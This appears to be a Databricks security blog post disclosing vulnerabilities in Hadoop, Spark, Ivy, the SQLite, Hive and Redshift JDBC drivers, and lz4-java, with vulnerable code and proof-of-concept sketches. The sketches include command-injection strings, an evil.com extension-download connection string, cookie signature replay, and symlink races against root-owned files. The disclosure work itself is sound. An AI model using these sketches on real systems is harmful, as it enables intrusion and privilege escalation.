The Databricks Product Security team is deeply committed to ensuring the security and integrity of its products, which are built on top of and integrated with a variety of open source projects. Recognizing the importance of these open source foundations, the team actively contributes to the security of these projects, thereby enhancing the overall security posture of both Databricks products and the broader open source ecosystem. This commitment is manifested through several key activities, including identifying and reporting vulnerabilities, contributing patches, and participating in security reviews and audits of open source projects. By doing so, Databricks not only safeguards its own products but also supports the resilience and security of the open source projects it relies on.
This blog provides an overview of the technical details of some of the vulnerabilities that the team discovered.
CVE-2022-26612: Hadoop FileUtil unTarUsingTar shell command injection vulnerability
Apache Hadoop Common offers an API that allows users to untar an archive using the tar Unix tool. To do so, it builds a command line, potentially also using gzip, and executes it. The issue lies in the fact that the path to the archive, which can be under user control, is not properly escaped in some situations. This could allow a malicious user to inject their own commands through the archive name, via shell metacharacters for example.
The vulnerable code can be found here.
untarCommand.append("cd '")
.append(FileUtil.makeSecureShellPath(untarDir))
.append("' && ")
.append("tar -xf ");
if (gzipped) {
untarCommand.append(" -)");
} else {
untarCommand.append(FileUtil.makeSecureShellPath(inFile)); // <== not single-quoted!
}
String[] shellCmd = { "bash", "-c", untarCommand.toString() };
ShellCommandExecutor shexec = new ShellCommandExecutor(shellCmd);
shexec.execute();
Note that makeSecureShellPath only escapes single quotes but does not add any. There were some debates as to the implications of the issue for Hadoop itself, but ultimately, since it is a publicly offered API, it ended up warranting a fix. Databricks was invested in fixing this issue since the Spark code for unpack was leveraging the vulnerable code.
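To illustrate the impact, here is a minimal sketch (the archive path and injected command are hypothetical) of how a crafted file name survives makeSecureShellPath and changes the meaning of the command handed to bash -c:
public class UntarInjectionSketch {
  public static void main(String[] args) {
    String untarDir = "/tmp/extract";
    // Hypothetical attacker-controlled archive path: it contains no single quotes,
    // so makeSecureShellPath would leave it untouched, and it is never quoted.
    String inFile = "/uploads/archive.tar; touch /tmp/pwned #";
    String untarCommand = "cd '" + untarDir + "' && tar -xf " + inFile;
    // bash -c "cd '/tmp/extract' && tar -xf /uploads/archive.tar; touch /tmp/pwned #"
    // The semicolon terminates the tar invocation and runs the injected command.
    System.out.println(untarCommand);
  }
}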
CVE-2022-33891: Apache Spark™ UI shell command injection vulnerability
Apache Spark™ uses an API to map a given user name to the set of groups it belongs to. One of the implementations is ShellBasedGroupsMappingProvider, which leveraged the id Unix command. The username passed to the function was appended to the command without being properly escaped, potentially allowing for arbitrary command injection.
The vulnerable code can be found here.
// shells out a "bash -c id -Gn username" to get user groups
private def getUnixGroups(username: String): Set[String] = {
val cmdSeq = Seq("bash", "-c", "id -Gn " + username) // <== potential command injection!
// we need to get rid of the trailing "\n" from the result of command execution
Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
}
We had to determine whether this provider could be reached with untrusted user input, and found the following path:
- ShellBasedGroupsMappingProvider.getGroups
- Utils.getCurrentUserGroups
- SecurityManager.isUserInACL
- SecurityManager.checkUIViewPermissions
- HttpSecurityFilter.doFilter
Ironically, the Spark UI HTTP security filter could allow that code to be reached via the doAs query parameter (see here). Fortunately, some checks in isUserInACL prevented this vulnerability from being triggerable in a default configuration.
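As a minimal sketch (in Java, with a made-up payload), this is how an unsanitized doAs value would flow into the id command if it reached the provider:
public class GroupsMappingInjectionSketch {
  public static void main(String[] args) {
    // Hypothetical value of the ?doAs= query parameter.
    String username = "nobody; touch /tmp/pwned";
    // Mirrors the provider's command construction: the username is concatenated
    // into the string passed to bash -c without any escaping.
    String[] cmdSeq = { "bash", "-c", "id -Gn " + username };
    System.out.println(String.join(" ", cmdSeq));
    // Runtime.getRuntime().exec(cmdSeq) would run "id -Gn nobody" and then
    // the injected "touch /tmp/pwned".
  }
}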
Apache Ivy "zip slip" directory traversal vulnerability
Apache Ivy supports a packaging attribute that allows artifacts to be unpacked on the fly. The function used to perform the Zip unpacking did not check for "../" in the Zip entry names, allowing for a directory traversal type of attack, also known as "zip slip".
The vulnerable code can be found here.
while (((entry = zip.getNextEntry()) != null)) {
File f = new File(dest, entry.getName()); // <== no check on the name of the entry!
Message.verbose("\t\texpanding " + entry.getName() + " to " + f);
// create intermediary directories - sometimes zip don't add them
File dirF = f.getParentFile();
if (dirF != null) {
dirF.mkdirs();
}
if (entry.isDirectory()) {
f.mkdirs();
} else {
writeFile(zip, f);
}
f.setLastModified(entry.getTime());
}
This could allow a user with the ability to feed Ivy a malicious module descriptor to write files outside of the local download cache.
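The standard defense, shown below as a minimal sketch (not Ivy's actual patch), is to canonicalize each resolved entry path and reject anything that escapes the extraction directory:
import java.io.File;
import java.io.IOException;

public class ZipSlipCheckSketch {
  // Resolves an entry name against the destination directory and rejects
  // entries such as "../../etc/crontab" that would land outside of it.
  static File safeResolve(File dest, String entryName) throws IOException {
    File f = new File(dest, entryName);
    String destPath = dest.getCanonicalPath() + File.separator;
    if (!f.getCanonicalPath().startsWith(destPath)) {
      throw new IOException("Zip entry escapes extraction directory: " + entryName);
    }
    return f;
  }

  public static void main(String[] args) throws IOException {
    File dest = new File("/tmp/ivy-unpack");
    System.out.println(safeResolve(dest, "lib/ok.jar"));        // accepted
    System.out.println(safeResolve(dest, "../../etc/crontab")); // throws IOException
  }
}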
CVE-2023-32697: SQLite JDBC driver remote code execution
The SQLite JDBC driver can be made to load a remote extension due to predictable temporary file naming when loading a remote database file using the jdbc:sqlite::resource and enable_load_extension options that enable extension loading.
The main issue is using the hashCode method to generate a temporary name without taking into account that hashCode will produce the same output for the same string across JVMs: an attacker can predict the output and, therefore, the location of the downloaded file.
The vulnerable code can be found here.
String tempFolder = new File(System.getProperty("java.io.tmpdir")).getAbsolutePath();
String dbFileName = String.format("sqlite-jdbc-tmp-%d.db", resourceAddr.hashCode()); // <== predictable temporary file
File dbFile = new File(tempFolder, dbFileName);
While the issue can be triggered in a single step, here is a breakdown for simplicity:
Using the following connection string: "jdbc:sqlite::resource:http://evil.com/evil.so?enable_load_extension=true"
This will result in downloading the .so file to a predictable location in the /tmp folder, which can later be loaded using: "select load_extension('/tmp/sqlite-jdbc-tmp-{NUMBER}.db')"
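Here is a minimal sketch of the attacker-side computation, assuming the resource address hashes as a plain string the way the snippet above suggests; the point is simply that the temporary file name can be computed offline:
public class PredictableTempNameSketch {
  public static void main(String[] args) {
    // Same URL as in the connection string above (attacker-hosted).
    String resourceAddr = "http://evil.com/evil.so";
    // String.hashCode is deterministic across JVMs, so this matches the name
    // the driver will pick on the victim side.
    String dbFileName = String.format("sqlite-jdbc-tmp-%d.db", resourceAddr.hashCode());
    System.out.println("/tmp/" + dbFileName);
  }
}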
CVE-2023-35701: Apache Hive JDBC driver arbitrary command execution
JDBC driver scrutiny has increased in the past few years, thanks to the work of people like pyn3rd, who presented their work at security conferences worldwide, notably "Make JDBC Attacks Brilliant Again." This issue is just a byproduct of their work, as it looks very similar to another issue they reported in the Snowflake JDBC driver.
The core of the issue resides in the openBrowserWindow function, which can be found here.
//Desktop is not supported, lets try to open the browser process
OsType os = getOperatingSystem();
switch (os) {
case WINDOWS:
Runtime.getRuntime()
.exec("rundll32 url.dll,FileProtocolHandler " + ssoUri.toString());
break;
case MAC:
Runtime.getRuntime().exec("open " + ssoUri.toString());
break;
case LINUX:
Runtime.getRuntime().exec("xdg-open " + ssoUri.toString());
break;
This function will execute a command based on the redirect URI, which could potentially be supplied by an untrusted source.
To trigger the issue, one can specify a connection string such as jdbc:hive2://URL/default;auth=browser;transportMode=http;httpPath=jdbc;ssl=true, which uses the browser authentication mechanism, with an endpoint that will return a 302 and specify a Location header (as well as X-Hive-Client-Identifier) to provoke the faulty behavior. The fact that ssoURI is a Java URI restricts the freedom that an attacker would have with their crafted command line.
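As a minimal sketch of the trigger (the host name is hypothetical, and the redirecting endpoint has to be under attacker control), reaching the faulty code path only requires connecting with browser authentication enabled:
import java.sql.Connection;
import java.sql.DriverManager;

public class HiveBrowserAuthSketch {
  public static void main(String[] args) throws Exception {
    // Browser-based SSO: the driver follows the server's 302 redirect and hands
    // the Location value to openBrowserWindow as ssoUri.
    String url = "jdbc:hive2://attacker.example:443/default;auth=browser;"
        + "transportMode=http;httpPath=jdbc;ssl=true";
    try (Connection conn = DriverManager.getConnection(url)) {
      // Not reached if the malicious redirect triggers the exec() call first.
    }
  }
}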
CVE-2024-23945: Apache Spark™ and Hive Thrift Server cookie verification bypass
Spark's ThriftHttpServlet can be made to accept a cookie that will serve as a way to authenticate a user. This is controlled by the hive.server2.thrift.http.cookie.auth.enabled configuration option (the default value for this option depends on the project, but some of them have it set to true). The validateCookie function will be used to verify it, which will eventually call CookieSigner.verifyAndExtract. The issue resides in the fact that on verification failure, an exception will be raised that returns both the received signature and the expected valid one, allowing a user to send the request again with said valid signature.
The vulnerable code can be found here.
if (!MessageDigest.isEqual(originalSignature.getBytes(), currentSignature.getBytes())) {
throw new IllegalArgumentException("Invalid sign, original = " + originalSignature +
" current = " + currentSignature); // <== outputs the actual expected signature!
}
Example output returned to the client:
java.lang.IllegalArgumentException: Invalid sign, original = AAAA current = OoWtbzoNldPiaNNNQ9UTpHI5Ii7PkPGZ+/3Fiv++GO8=
at org.apache.hive.service.CookieSigner.verifyAndExtract(CookieSigner.java:84)
at org.apache.hive.service.cli.thrift.ThriftHttpServlet.getClientNameFromCookie(ThriftHttpServlet.java:226)
at org.apache.hive.service.cli.thrift.ThriftHttpServlet.validateCookie(ThriftHttpServlet.java:282)
at org.apache.hive.service.cli.thrift.ThriftHttpServlet.doPost(ThriftHttpServlet.java:127)
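To make the bypass concrete, here is a minimal attacker-side sketch; the server address, cookie name, and cookie layout are assumptions for illustration, but the flow matches the issue described above: submit a bogus signature, read the expected one from the error, and replay it:
import java.net.HttpURLConnection;
import java.net.URL;

public class CookieReplaySketch {
  static int post(String cookieValue) throws Exception {
    // Hypothetical Thrift-over-HTTP endpoint and cookie name.
    URL url = new URL("http://thrift-server:10001/cliservice");
    HttpURLConnection conn = (HttpURLConnection) url.openConnection();
    conn.setRequestMethod("POST");
    conn.setRequestProperty("Cookie", "hive.server2.auth=" + cookieValue);
    return conn.getResponseCode();
  }

  public static void main(String[] args) throws Exception {
    // Step 1: send a bogus signature; the IllegalArgumentException shown above
    // leaks the expected value for this cookie payload.
    post("cu=admin&s=AAAA");
    // Step 2: replay the cookie with the leaked signature to pass validateCookie.
    post("cu=admin&s=OoWtbzoNldPiaNNNQ9UTpHI5Ii7PkPGZ+/3Fiv++GO8=");
  }
}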
Both Apache Hive and Apache Spark™ were vulnerable to this and were fixed with the following PRs:
The timeline for this issue to be fixed and published illustrates some of the difficulties encountered when reporting vulnerabilities to open source projects:
- May 16, 2023: reported to [email protected]
- May 17, 2023: acknowledged
- Jun 9, 2023: requested an update on the case
- Jun 12, 2023: reply that this is a security issue
- Oct 16, 2023: requested an update on the case
- Oct 17, 2023: reply that a patch will be applied to Spark, but the status on the Hive side is unclear
- Nov 6, 2023: requested an update on the case
- Dec 4, 2023: requested an update on the case after noticing that the issue is publicly fixed in Hive and Spark
- Feb 7, 2024: requested an update on the case
- Feb 23, 2024: release of Spark 3.5.1
- Mar 5, 2024: requested an update on the case
- Mar 20, 2024: reply that this has been assigned CVE-2024-23945 on the Spark side
- Mar 29, 2024: release of Hive 4.0.0
- Apr 19, 2024: announced that we will publish details of the issue since it has been more than a year, with little to no updates from the relevant Apache PMCs
Redshift JDBC Arbitrary File Append
The Amazon JDBC Driver for Redshift is a Type 4 JDBC driver that provides database connectivity through the standard JDBC APIs available in the Java Platform, Enterprise Edition. This driver allows any Java application, application server, or Java-enabled applet to access Redshift.
If the JDBC driver is used across a privilege boundary, an attacker can use the Redshift JDBC Driver's logging functionality to append partially controlled log contents to any file on the filesystem. The contents can contain newlines / arbitrary characters and can be used to elevate privileges.
In the connection URL, a "LogPath" variable can be used to supply the path in which log files should be stored.
This results in files such as "redshift_jdbc_connection_XX.log," where XX is a sequential number within the directory, and log entries are written to the file as expected. When creating these files, symbolic links are honored, and the log contents are written to the target of the link.
By using a controlled directory and symlinking to critical files, a user in our environment can gain a controlled write to arbitrary root-owned files and elevate privileges on the system.
The source code for the Redshift JDBC logfile handling is available in the following repo: https://github.com/aws/amazon-redshift-jdbc-driver/blame/33e046e1ccef43517fe4deb96f38cc5ac2bc73d1/src/main/java/com/amazon/redshift/logger/LogFileHandler.java#L225
To recreate this, you can create a directory in tmp, such as "/tmp/logging." Inside this directory, the user should create symbolic links with filenames matching the pattern redshift_jdbc_connection_XX.log, where the log file number increments each time the Redshift JDBC connector is used.
These symbolic links should point to the file you wish to append to. The attacker can then trigger the use of the Redshift JDBC connector, which follows the symlink and appends to the target file.
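A minimal sketch of that setup (paths, the number of links, and the exact file-name formatting are assumptions for illustration):
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

public class RedshiftLogSymlinkSketch {
  public static void main(String[] args) throws Exception {
    Path logDir = Files.createDirectories(Paths.get("/tmp/logging"));
    // Root-owned file the attacker wants to append to (hypothetical target).
    Path target = Paths.get("/etc/target-file");
    // Pre-create symlinks matching the driver's sequential log file names so
    // whichever one it opens next resolves to the target.
    for (int i = 0; i < 20; i++) {
      Files.createSymbolicLink(
          logDir.resolve("redshift_jdbc_connection_" + i + ".log"), target);
    }
    // The victim connection then uses LogPath=/tmp/logging in its JDBC URL.
  }
}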
LZ4 Java arbitrary file write privilege escalation
The lz4-java library (a Java wrapper around the lz4 library) contains a file-based race condition vulnerability that occurs when the compiled native library is dropped onto disk. Large Java applications such as Spark and Hadoop use this library heavily.
The following code demonstrates this vulnerability:
File tempLib = null;
File tempLibLock = null;
try {
// Create the .lck file first to avoid a race condition
// with other concurrently running Java processes using lz4-java.
tempLibLock = File.createTempFile("liblz4-java-", "." + os().libExtension + ".lck");
tempLib = new File(tempLibLock.getAbsolutePath().replaceFirst(".lck$", ""));
// copy to tempLib
try (FileOutputStream out = new FileOutputStream(tempLib)) {
byte[] buf = new byte[4096];
while (true) {
int read = is.read(buf);
if (read == -1) {
break;
}
out.write(buf, 0, read);
}
}
}
System.load(tempLib.getAbsolutePath());
As you can see, this code writes out a .so stored within the jar file to a temporary directory before loading and executing it. The createTempFile function is used to generate a unique path to avoid collisions. Before writing the file to disk, the developer creates a variant of the file with a .lck extension, for the assumed purpose of preventing collisions with other processes using the library. However, this .lck file allows an attacker watching the directory to attempt to race the creation of the file: after learning the filename from the .lck creation, they can create a symbolic link pointing anywhere on the filesystem.
The ramifications of this are twofold: first, the attacker will be able to overwrite any file on the system with the contents of this .so file, which may allow an unprivileged attacker to overwrite root-owned files. Second, the symlink can be replaced between writing and loading, allowing the attacker to have a custom shared object of their choosing loaded as root. If this library is used across a privilege boundary, this may grant an attacker code execution at an elevated privilege level.
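Here is a minimal attacker-side sketch of the race (directory, target path, and timing are illustrative, and winning the race is not guaranteed): watch the temp directory for the .lck marker, derive the library path from it, and plant a symlink before the victim writes and loads the file:
import java.nio.file.*;

public class Lz4RaceSketch {
  public static void main(String[] args) throws Exception {
    Path tmp = Paths.get(System.getProperty("java.io.tmpdir"));
    try (WatchService ws = tmp.getFileSystem().newWatchService()) {
      tmp.register(ws, StandardWatchEventKinds.ENTRY_CREATE);
      while (true) {
        WatchKey key = ws.take();
        for (WatchEvent<?> ev : key.pollEvents()) {
          String name = ev.context().toString();
          if (name.startsWith("liblz4-java-") && name.endsWith(".lck")) {
            // The library will be written to the same path minus ".lck";
            // plant a symlink there before the victim's FileOutputStream opens it.
            Path lib = tmp.resolve(name.substring(0, name.length() - 4));
            Files.createSymbolicLink(lib, Paths.get("/etc/target-file"));
          }
        }
        key.reset();
      }
    }
  }
}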
Conclusion
At Databricks, we recognize that enhancing the security of the open source software we utilize is a collective effort. We are committed to proactively improving the security of our contributions and dependencies, fostering collaboration within the community, and implementing best practices to safeguard our systems. By prioritizing security and encouraging transparency, we aim to create a more resilient open source environment for everyone. Learn more about Databricks Security on our Security and Trust Center.